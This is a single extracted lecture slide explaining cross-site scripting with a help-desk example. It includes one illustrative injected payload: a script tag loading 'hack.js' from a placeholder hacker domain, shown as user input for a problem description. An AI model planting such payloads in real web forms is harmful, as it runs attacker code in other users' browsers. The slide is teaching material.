19 of 31
Cross-Site Scripting (1)
uBasic
premise: Malicious data input from an outside source and then
transmitted to users without being validated for malicious
content.
ØService request example:
§Add a new request and specify a problem description.
§Developer
expects something like “Ice machine not working”
§What
happens if user enters “Ice machine not working <script
src=http://www.hacker.com/hack.js></script>”
